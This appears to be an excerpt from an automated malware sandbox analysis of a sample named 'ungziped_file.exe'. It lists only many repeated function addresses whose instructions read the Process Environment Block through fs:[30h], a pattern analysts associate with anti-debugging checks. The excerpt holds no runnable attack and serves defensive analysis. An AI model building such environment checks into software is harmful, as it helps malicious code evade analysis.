                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A60B8 mov eax, dword ptr fs:[00000030h] 5_2_012A60B8
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A60B8 mov ecx, dword ptr fs:[00000030h] 5_2_012A60B8
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E208A mov eax, dword ptr fs:[00000030h] 5_2_011E208A
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012660E0 mov eax, dword ptr fs:[00000030h] 5_2_012660E0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012220F0 mov ecx, dword ptr fs:[00000030h] 5_2_012220F0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DC0F0 mov eax, dword ptr fs:[00000030h] 5_2_011DC0F0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E80E9 mov eax, dword ptr fs:[00000030h] 5_2_011E80E9
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012620DE mov eax, dword ptr fs:[00000030h] 5_2_012620DE
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DA0E3 mov ecx, dword ptr fs:[00000030h] 5_2_011DA0E3
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DC310 mov ecx, dword ptr fs:[00000030h] 5_2_011DC310
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0121A30B mov eax, dword ptr fs:[00000030h] 5_2_0121A30B
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01200310 mov ecx, dword ptr fs:[00000030h] 5_2_01200310
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0128437C mov eax, dword ptr fs:[00000030h] 5_2_0128437C
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01262349 mov eax, dword ptr fs:[00000030h] 5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012AA352 mov eax, dword ptr fs:[00000030h] 5_2_012AA352
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01288350 mov ecx, dword ptr fs:[00000030h] 5_2_01288350
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126035C mov eax, dword ptr fs:[00000030h] 5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126035C mov ecx, dword ptr fs:[00000030h] 5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126035C mov eax, dword ptr fs:[00000030h] 5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011D8397 mov eax, dword ptr fs:[00000030h] 5_2_011D8397
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h] 5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h]5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h]5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120438F mov eax, dword ptr fs:[00000030h]5_2_0120438F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120438F mov eax, dword ptr fs:[00000030h]5_2_0120438F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012163FF mov eax, dword ptr fs:[00000030h]5_2_012163FF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129C3CD mov eax, dword ptr fs:[00000030h]5_2_0129C3CD
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012663C0 mov eax, dword ptr fs:[00000030h]5_2_012663C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012843D4 mov eax, dword ptr fs:[00000030h]5_2_012843D4
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012843D4 mov eax, dword ptr fs:[00000030h]5_2_012843D4
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D823B mov eax, dword ptr fs:[00000030h]5_2_011D823B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E6259 mov eax, dword ptr fs:[00000030h]5_2_011E6259
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA250 mov eax, dword ptr fs:[00000030h]5_2_011DA250
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01268243 mov eax, dword ptr fs:[00000030h]5_2_01268243
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01268243 mov ecx, dword ptr fs:[00000030h]5_2_01268243
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D826B mov eax, dword ptr fs:[00000030h]5_2_011D826B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov ecx, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E284 mov eax, dword ptr fs:[00000030h]5_2_0121E284
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E284 mov eax, dword ptr fs:[00000030h]5_2_0121E284
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02A0 mov eax, dword ptr fs:[00000030h]5_2_011F02A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02A0 mov eax, dword ptr fs:[00000030h]5_2_011F02A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01276500 mov eax, dword ptr fs:[00000030h]5_2_01276500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8550 mov eax, dword ptr fs:[00000030h]5_2_011E8550
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8550 mov eax, dword ptr fs:[00000030h]5_2_011E8550
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012045B1 mov eax, dword ptr fs:[00000030h]5_2_012045B1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012045B1 mov eax, dword ptr fs:[00000030h]5_2_012045B1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2582 mov eax, dword ptr fs:[00000030h]5_2_011E2582
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2582 mov ecx, dword ptr fs:[00000030h]5_2_011E2582
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01214588 mov eax, dword ptr fs:[00000030h]5_2_01214588
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E59C mov eax, dword ptr fs:[00000030h]5_2_0121E59C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C5ED mov eax, dword ptr fs:[00000030h]5_2_0121C5ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C5ED mov eax, dword ptr fs:[00000030h]5_2_0121C5ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E65D0 mov eax, dword ptr fs:[00000030h]5_2_011E65D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E5CF mov eax, dword ptr fs:[00000030h]5_2_0121E5CF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E5CF mov eax, dword ptr fs:[00000030h]5_2_0121E5CF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A5D0 mov eax, dword ptr fs:[00000030h]5_2_0121A5D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A5D0 mov eax, dword ptr fs:[00000030h]5_2_0121A5D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E25E0 mov eax, dword ptr fs:[00000030h]5_2_011E25E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A430 mov eax, dword ptr fs:[00000030h]5_2_0121A430
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC427 mov eax, dword ptr fs:[00000030h]5_2_011DC427
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D645D mov eax, dword ptr fs:[00000030h]5_2_011D645D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126C460 mov ecx, dword ptr fs:[00000030h]5_2_0126C460
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120245A mov eax, dword ptr fs:[00000030h]5_2_0120245A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012144B0 mov ecx, dword ptr fs:[00000030h]5_2_012144B0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126A4B0 mov eax, dword ptr fs:[00000030h]5_2_0126A4B0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E64AB mov eax, dword ptr fs:[00000030h]5_2_011E64AB
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E04E5 mov ecx, dword ptr fs:[00000030h]5_2_011E04E5
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C720 mov eax, dword ptr fs:[00000030h]5_2_0121C720
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C720 mov eax, dword ptr fs:[00000030h]5_2_0121C720
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0710 mov eax, dword ptr fs:[00000030h]5_2_011E0710
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125C730 mov eax, dword ptr fs:[00000030h]5_2_0125C730
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121273C mov eax, dword ptr fs:[00000030h]5_2_0121273C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121273C mov ecx, dword ptr fs:[00000030h]5_2_0121273C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121273C mov eax, dword ptr fs:[00000030h]5_2_0121273C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C700 mov eax, dword ptr fs:[00000030h]5_2_0121C700
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01210710 mov eax, dword ptr fs:[00000030h]5_2_01210710
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E0750 mov eax, dword ptr fs:[00000030h]5_2_011E0750
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121674D mov esi, dword ptr fs:[00000030h]5_2_0121674D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121674D mov eax, dword ptr fs:[00000030h]5_2_0121674D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121674D mov eax, dword ptr fs:[00000030h]5_2_0121674D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8770 mov eax, dword ptr fs:[00000030h]5_2_011E8770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0770 mov eax, dword ptr fs:[00000030h]5_2_011F0770
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222750 mov eax, dword ptr fs:[00000030h]5_2_01222750
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01222750 mov eax, dword ptr fs:[00000030h]5_2_01222750
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01264755 mov eax, dword ptr fs:[00000030h]5_2_01264755
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126E75D mov eax, dword ptr fs:[00000030h]5_2_0126E75D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128678E mov eax, dword ptr fs:[00000030h]5_2_0128678E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E07AF mov eax, dword ptr fs:[00000030h]5_2_011E07AF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126E7E1 mov eax, dword ptr fs:[00000030h]5_2_0126E7E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012027ED mov eax, dword ptr fs:[00000030h]5_2_012027ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012027ED mov eax, dword ptr fs:[00000030h]5_2_012027ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012027ED mov eax, dword ptr fs:[00000030h]5_2_012027ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EC7C0 mov eax, dword ptr fs:[00000030h]5_2_011EC7C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E47FB mov eax, dword ptr fs:[00000030h]5_2_011E47FB
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E47FB mov eax, dword ptr fs:[00000030h]5_2_011E47FB
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012607C3 mov eax, dword ptr fs:[00000030h]5_2_012607C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01216620 mov eax, dword ptr fs:[00000030h]5_2_01216620
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218620 mov eax, dword ptr fs:[00000030h]5_2_01218620
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F260B mov eax, dword ptr fs:[00000030h]5_2_011F260B
